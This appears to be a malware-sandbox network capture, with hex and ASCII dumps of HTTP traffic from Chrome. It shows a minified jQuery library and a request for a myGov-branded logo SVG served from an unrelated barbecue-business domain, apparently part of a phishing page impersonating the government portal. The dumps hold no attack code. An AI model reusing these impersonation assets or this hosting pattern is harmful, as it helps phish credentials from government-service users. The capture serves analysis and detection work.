                                                        2024-12-25 01:23:14 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                        Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                        2024-12-25 01:23:14 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                        Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                        2024-12-25 01:23:14 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                        Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                        2024-12-25 01:23:14 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                        Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                        2024-12-25 01:23:14 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                        Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                        2024-12-25 01:23:14 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                        Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                        2024-12-25 01:23:14 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                        Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                        2024-12-25 01:23:14 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                        Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                        2024-12-25 01:23:14 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                        Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                        2024-12-25 01:23:14 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                        Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.449786104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:16 UTC838OUTGET /portbiz/images/myGov-cobranded-logo-black.svg HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:16 UTC1079INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:16 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: max-age=5184000
                                                        Pragma: public
                                                        Last-Modified: Wed, 11 Dec 2024 06:10:16 GMT
                                                        Expires: Fri, 21 Feb 2025 14:30:35 GMT
                                                        CF-Cache-Status: HIT
                                                        Age: 125561
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4Q3ffg%2BBiE%2Br%2F8%2BV0jWRKGTdfdqGB1bsJOjhFA0E7PAfENpwt97BRjUuEZZM%2FE%2B5ktwm3T5TBsdwhppdrkaixrdXfRL8bkJAiH6ciROJg9tD9xhBaiaLynACkHcK1DWMMEE"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f75065bcd31c34f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1466&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1416&delivery_rate=1921052&cwnd=181&unsent_bytes=0&cid=2d3d1f97d93cbcf4&ts=446&x=0"
                                                        2024-12-25 01:23:16 UTC290INData Raw: 37 63 34 30 0d 0a 3c 73 76 67 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 39 33 2e 34 37 20 31 35 30 2e 35 37 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 63 6c 73 2d 31 7b 66 69 6c 6c 3a 23 32 33 31 66 32 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 34 32 30 2c 32 32 2e 30 39 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2d 38 2e 37 36 2c 38 2e 37 36 56 35 33 2e 35 31 4c 34 35 35 2c 39 37 2e 33 33 6c 2d 34 33 2e 38 32 2c 34 33 2e 38 31 76 32 32 2e 36 37 41 38 2e 37 35
                                                        Data Ascii: 7c40<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 693.47 150.57"><defs><style>.cls-1{fill:#231f20;}</style></defs><path class="cls-1" d="M420,22.09a8.76,8.76,0,0,0-8.76,8.76V53.51L455,97.33l-43.82,43.81v22.67A8.75
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 34 32 36 2e 31 35 2c 32 34 2e 36 35 61 38 2e 37 35 2c 38 2e 37 35 2c 30 2c 30 2c 30 2d 36 2e 32 2d 32 2e 35 36 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 33 38 32 2e 33 31 2c 32 34 2e 36 33 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2d 31 34 2e 39 33 2c 36 2e 32 32 56 31 36 33 2e 37 38 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2c 31 35 2c 36 2e 31 38 6c 32 38 2e 38 31 2d 32 38 2e 38 32 56 35 33 2e 35 31 4c 33 38 32 2e 33 31 2c 32 34 2e 36 33 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22
                                                        Data Ascii: 426.15,24.65a8.75,8.75,0,0,0-6.2-2.56Z" transform="translate(-23 -22)"/><path class="cls-1" d="M382.31,24.63a8.76,8.76,0,0,0-14.93,6.22V163.78a8.76,8.76,0,0,0,15,6.18l28.81-28.82V53.51L382.31,24.63Z" transform="translate(-23 -22)"/><path class="cls-1" d="
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 35 68 2d 2e 35 33 61 33 2e 33 33 2c 33 2e 33 33 2c 30 2c 30 2c 31 2d 2e 35 35 2e 36 37 2e 39 32 2e 39 32 2c 30 2c 30 2c 31 2d 2e 34 34 2e 31 2c 31 2e 34 36 2c 31 2e 34 36 2c 30 2c 30 2c 31 2d 2e 36 39 2d 2e 32 33 2c 35 2c 35 2c 30 2c 30 2c 30 2d 32 2e 32 39 2d 2e 35 38 2c 34 2e 32 33 2c 34 2e 32 33 2c 30 2c 30 2c 30 2d 33 2e 33 36 2c 31 2e 33 37 2c 34 2e 36 2c 34 2e 36 2c 30 2c 30 2c 30 2d 31 2e 31 34 2c 33 2c 34 2e 33 38 2c 34 2e 33 38 2c 30 2c 30 2c 30 2c 31 2c 32 2e 38 31 2c 31 36 2e 34 2c 31 36 2e 34 2c 30 2c 30 2c 30 2c 33 2e 30 38 2c 32 2e 35 32 2c 31 31 2e 34 32 2c 31 31 2e 34 32 2c 30 2c 30 2c 31 2c 32 2e 30 38 2c 31 2e 36 35 2c 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 2e 34 37 2c 31 2e 32 39 2c 31 2e 35 33 2c 31 2e 35 33 2c 30 2c 30 2c 31
                                                        Data Ascii: 5h-.53a3.33,3.33,0,0,1-.55.67.92.92,0,0,1-.44.1,1.46,1.46,0,0,1-.69-.23,5,5,0,0,0-2.29-.58,4.23,4.23,0,0,0-3.36,1.37,4.6,4.6,0,0,0-1.14,3,4.38,4.38,0,0,0,1,2.81,16.4,16.4,0,0,0,3.08,2.52,11.42,11.42,0,0,1,2.08,1.65,1.92,1.92,0,0,1,.47,1.29,1.53,1.53,0,0,1
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 30 2c 31 2e 34 33 2e 35 33 2c 31 2e 35 35 2c 31 2e 35 35 2c 30 2c 30 2c 30 2c 31 2e 32 31 2d 2e 35 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 30 2c 2e 35 32 2d 31 2e 36 32 2c 32 2c 32 2c 30 2c 30 2c 30 2d 2e 35 34 2d 31 2e 35 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 31 2e 33 38 2d 2e 35 34 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 30 37 2e 38 35 2c 31 37 30 2e 32 38 61 2e 35 36 2e 35 36 2c 30 2c 30 2c 31 2d 2e 33 36 2d 2e 31 32 2e 37 39 2e 37 39 2c 30 2c 30 2c 31 2d 2e 32 33 2d 2e 33 38 2c 36 2c 36 2c 30 2c 30 2c 31 2d 2e 30 38 2d 31 2e 32 36 76 2d 35 2e 36 34 61
                                                        Data Ascii: .11,2.11,0,0,0,1.43.53,1.55,1.55,0,0,0,1.21-.57,2.39,2.39,0,0,0,.52-1.62,2,2,0,0,0-.54-1.51,1.77,1.77,0,0,0-1.38-.54Z" transform="translate(-23 -22)"/><path class="cls-1" d="M107.85,170.28a.56.56,0,0,1-.36-.12.79.79,0,0,1-.23-.38,6,6,0,0,1-.08-1.26v-5.64a
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 2c 32 2e 34 2c 30 2c 30 2c 30 2d 31 2e 37 2d 34 2e 31 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 30 2d 31 2e 36 39 2e 37 31 2c 32 2e 33 2c 32 2e 33 2c 30 2c 30 2c 30 2d 2e 37 2c 31 2e 37 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 32 34 2e 33 31 2c 31 36 39 2e 30 35 56 31 35 37 2e 35 33 68 2d 36 2e 31 76 2e 35 38 61 31 2e 39 2c 31 2e 39 2c 30 2c 30 2c 31 2c 31 2e 33 39 2e 34 39 2c 33 2e 34 34 2c 33 2e 34 34 2c 30 2c 30 2c 31 2c 2e 33 35 2c 32 76 38 2e 34 39 61 33 2e 34 36 2c 33 2e 34 36 2c 30 2c 30 2c 31 2d 2e 33 31 2c 31 2e 39 2c 31 2e 39 2c 31 2e 39 2c 30 2c 30 2c 31 2d 31 2e 34 33 2e 35 36 76 2e 35 36 68 37 2e 38 35
                                                        Data Ascii: ,2.4,0,0,0-1.7-4.1,2.25,2.25,0,0,0-1.69.71,2.3,2.3,0,0,0-.7,1.7Z" transform="translate(-23 -22)"/><path class="cls-1" d="M124.31,169.05V157.53h-6.1v.58a1.9,1.9,0,0,1,1.39.49,3.44,3.44,0,0,1,.35,2v8.49a3.46,3.46,0,0,1-.31,1.9,1.9,1.9,0,0,1-1.43.56v.56h7.85
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 2e 34 36 2c 34 2e 34 36 2c 30 2c 30 2c 30 2d 32 2e 32 31 2e 35 36 2c 38 2e 33 39 2c 38 2e 33 39 2c 30 2c 30 2c 30 2d 32 2e 31 35 2c 31 2e 37 35 76 2d 31 2e 38 38 68 2d 35 2e 39 32 76 2e 35 38 61 31 2e 38 36 2c 31 2e 38 36 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2e 31 38 2c 34 2e 31 38 2c 30 2c 30 2c 31 2c 2e 33 31 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 32 37 2c 34 2e 32 37 2c 30 2c 30 2c 31 2d 2e 32 37 2c 32 2c 31 2e 37 39 2c 31 2e 37 39 2c 30 2c 30 2c 31 2d 31 2e 33 2e 35 39 76 2e 35 36 68 37 2e 33 36 76 2d 2e 35 36 61 31 2e 35 38 2c 31 2e 35 38 2c 30 2c 30 2c 31 2d 31 2e 31 34 2d 2e 35 34 2c 34 2e 33 38 2c 34 2e 33 38 2c 30 2c 30 2c 31 2d 2e 33 2d 32 2e 30 37 76 2d 37 2e 37 39 71 31 2e 31 35 2d 31 2e 39 32 2c 32 2e 34 39 2d 31 2e 39 32 61 31 2e
                                                        Data Ascii: .46,4.46,0,0,0-2.21.56,8.39,8.39,0,0,0-2.15,1.75v-1.88h-5.92v.58a1.86,1.86,0,0,1,1.26.52,4.18,4.18,0,0,1,.31,2.06v8.21a4.27,4.27,0,0,1-.27,2,1.79,1.79,0,0,1-1.3.59v.56h7.36v-.56a1.58,1.58,0,0,1-1.14-.54,4.38,4.38,0,0,1-.3-2.07v-7.79q1.15-1.92,2.49-1.92a1.
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 33 2d 31 2c 35 2e 39 33 2c 35 2e 39 33 2c 30 2c 30 2c 30 2d 35 2c 32 2e 33 33 2c 38 2e 35 35 2c 38 2e 35 35 2c 30 2c 30 2c 30 2d 31 2e 38 31 2c 35 2e 34 34 2c 38 2e 34 34 2c 38 2e 34 34 2c 30 2c 30 2c 30 2c 31 2e 37 38 2c 35 2e 33 33 2c 36 2c 36 2c 30 2c 30 2c 30 2c 35 2c 32 2e 33 41 36 2e 32 33 2c 36 2e 32 33 2c 30 2c 30 2c 30 2c 32 30 30 2e 39 2c 31 37 30 61 38 2e 34 31 2c 38 2e 34 31 2c 30 2c 30 2c 30 2c 31 2e 35 37 2d 35 2e 31 38 2c 39 2e 31 38 2c 39 2e 31 38 2c 30 2c 30 2c 30 2d 2e 38 36 2d 34 2c 36 2e 32 35 2c 36 2e 32 35 2c 30 2c 30 2c 30 2d 32 2e 34 37 2d 32 2e 37 38 5a 6d 2d 31 2e 35 36 2c 31 31 2e 34 39 61 32 2e 35 38 2c 32 2e 35 38 2c 30 2c 30 2c 31 2d 2e 38 2c 31 2e 34 38 2c 31 2e 37 36 2c 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 31 37 2e 33 39
